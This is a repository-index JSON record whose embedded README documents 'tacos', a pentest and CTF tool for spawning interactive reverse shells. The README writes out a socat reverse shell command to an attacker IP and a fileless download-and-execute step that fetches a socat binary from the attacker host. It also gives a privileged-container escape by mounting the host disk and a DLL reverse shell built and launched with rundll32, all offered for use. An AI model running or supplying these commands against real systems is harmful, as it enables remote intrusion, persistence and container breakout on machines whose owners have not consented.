{"id":19544863,"url":"https://github.com/ariary/tacos","last_synced_at":"2025-04-26T19:31:48.595Z","repository":{"id":44543525,"uuid":"463801168","full_name":"ariary/tacos","owner":"ariary","description":"🌮  INTERACTIVE reverse shell everywhere! (Particularly digestible with socat multi-handler listener)","archived":false,"fork":false,"pushed_at":"2023-11-03T14:02:22.000Z","size":3438,"stargazers_count":29,"open_issues_count":5,"forks_count":4,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-04T17:11:41.337Z","etag":null,"topics":["ctf","golang","infosec","interactive","pentest","pentest-tool","reverse-shell","security","socat"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ariary.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-02-26T08:48:36.000Z","updated_at":"2024-10-02T17:25:52.000Z","dependencies_parsed_at":"2023-01-29T14:15:47.816Z","dependency_job_id":"4b0ba44a-691f-4c7b-9e14-e4836f8b392e","html_url":"https://github.com/ariary/tacos","commit_stats":null,"previous_names":[],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Ftacos","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Ftacos/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Ftacos/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Ftacos/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ariary","download_url":"https://codeload.github.com/ariary/tacos/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251041427,"owners_count":21527193,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ctf","golang","infosec","interactive","pentest","pentest-tool","reverse-shell","security","socat"],"created_at":"2024-11-11T03:32:39.767Z","updated_at":"2025-04-26T19:31:48.257Z","avatar_url":"https://github.com/ariary.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# tacos 🌮 \n\u003csup\u003e(reverse `socat`)\u003c/sup\u003e\n\n\u003cdiv align=center\u003e\n\u003cimg src=https://github.com/ariary/tacos/blob/main/logo.png width=250\u003e\n\nSpawn a pty in your reverse shell to \u003cstrong\u003eautomaticaly\u003c/strong\u003e make it \u003cstrong\u003einteractive\u003c/strong\u003e for socat listener.\n\n\u003cstrong\u003e Fast interactive reverse shell set-up [ 🐳 (container) ](#with-docker-recommended)\u003c/strong\u003e\n\n\u003csup\u003e\u003ccode\u003e\u003cb\u003e All credit goes to \u003ca href=https://github.com/laluka/pty4all\u003elaluka\u003c/a\u003e idea \u003c/b\u003e\u003c/code\u003e\u003c/sup\u003e\n\u003c/div\u003e\n\n\n\nEquivalent of:\n```shell\nsocat exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP:PORT],verify=0\n```\n\n**Why ?**\n* transform RCE to interactive reverse shell with almost no prerequisite (only `curl`)\n* cross-platform *(windows support is OK but not yet interactive. It is recommended to use non-docker solution for it)*\n* tired of hitting ^C and loosing your shell?\n* too lazy to copy/paste/learn socat command\n* target doesn't have `socat` and you don't want to do [this](#alternative)\n* provide more advanced configuration to the tty (alias, etc)\n* easier to obfuscate\n\n\n## Usage\n\n« I quickly want an interactive reverse shell», take a wrap! 🥙\n```shell\n# On attacker machine\ntmux\nwrap --lhost [ATTACKER_IP] #launch socat listener + output command to run on target\n\n# On target\n# paste command outputted by wrap: it will download tacos, and launch it to obtain the interactive revshell\n```\n\n\u003cdetails\u003e\u003csummary\u003e\u003ch4\u003e🎁 Bonus n°1: expose listener to the world wide web\u003c/h4\u003e\u003c/summary\u003e\nUseful if target can't directly reach the attacker machine, but has internet access\n\u003cbr\u003e On attacker machine, install \u003ccode\u003engrok\u003c/code\u003e or \u003ccode\u003ebore\u003c/code\u003e and launch your listener:\n\u003cpre\u003e\u003ccode\u003ewrap -n\n\u003c/code\u003e\u003c/pre\u003e\n\n\u003ci\u003e\u003cb\u003eN.B:\u003c/b\u003e\u003c/i\u003e ngrok is more stable than bore for now\n\u003c/details\u003e\n\n### With docker (recommended)\n\nSource aliases *(for simplicity)*:\n```shell\nalias tacos.container='docker run --net host --rm -it ariary/tacos'\n```\n\nLaunch multi-handler listener:\n```shell\ntacos.container [LISTENING_ADDR] [LISTENING_PORT] # [OPTIONAL_TACOS_ARS]\n```\n\n***Notes about `tacos` container security:***\n\u003e From a networking point of view, this is the same level of isolation as if the processes were running directly on the host and not in a container. However, in all other ways, such as storage, process namespace, and user namespace, the process is isolated from the host.\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003ch4\u003e🎁 Bonus n°2: \u003ccode\u003etacos\u003c/code\u003e reverse shell image\u003c/h4\u003e\u003c/summary\u003e\nUseful if target is running docker, kubernetes, etc ...\n\u003cbr\u003e On attacker machine, launch your \u003ccode\u003etacos\u003c/code\u003e listener as usual\n\u003cbr\u003e On target:\n\u003cpre\u003e\u003ccode\u003e\ndocker run --privileged --rm -it ariary/tacos-reverse [TACOS_LISTENER_IP]:[TACOS_LISTENER_PORT]\n\u003c/code\u003e\u003c/pre\u003e\n\u003cblockquote\u003e💡: \u003ccode\u003e--privileged\u003c/code\u003e mode is not mandatory. It is used to allow container escaping with:\n\u003cpre\u003e\u003ccode\u003e\nfdisk -l\nmkdir /mnt/hostfs\nmount /dev/sda1 /mnt/hostfs\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/blockquote\u003e\n\u003cbr\u003e\n\u003cblockquote\u003e💡: If you only have writing access to a manifest deploying containers. Use \u003ccode\u003eariary/tacos-reverse\u003c/code\u003e image with appropriate arguments\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\n\n## Easy install\n\n* Requirements: go, git, tmux *(and ngrok, bore)*\n* Install all the stuff: `./install-all-in-one.sh`\n\nYou're now good to go !:\n```\ntacos.listener\n```\n\n## Alternatives\n\nAlternatively, if target does not have `socat`:\n**Host** a [static](https://github.com/minos-org/minos-static/blob/master/static-get) version of `socat` binary and **download + execute it** using the stealthy  [`filess-xec`](https://github.com/ariary/fileless-xec) dropper:\n```shell\n# On attacker machine\n# get socat static \u0026 expose it\nstatic-get socat\npython3 -m http.server 8080\n\n# On target machine\n# Use already downloaded fileless-xec to download socat and stealthy launch it with argument\nfileless-xec [ATTACKER_IP]:8080/socat -- exec:'bash -il',pty,stderr,setsid,sigint,sane OPENSSL:[ATTACKER_IP]:[SOCAT_LISTENING_PORT],verify=0\n```\n\n### Use dll instead of `.exe`\n```shell\n# On attacker machine:\n# modify ./cmd/tacosdll/tacosdll.go with the according IP:PORT\n$ GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -buildmode=c-shared -ldflags=\"-w -s -H=windowsgui\" -o tacos.dll ./cmd/tacosdll/tacosdll.go\n\n# On remote:\n\u003e rundll32.exe ./tacos.dll,Tacos\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Ftacos","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fariary%2Ftacos","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Ftacos/lists"}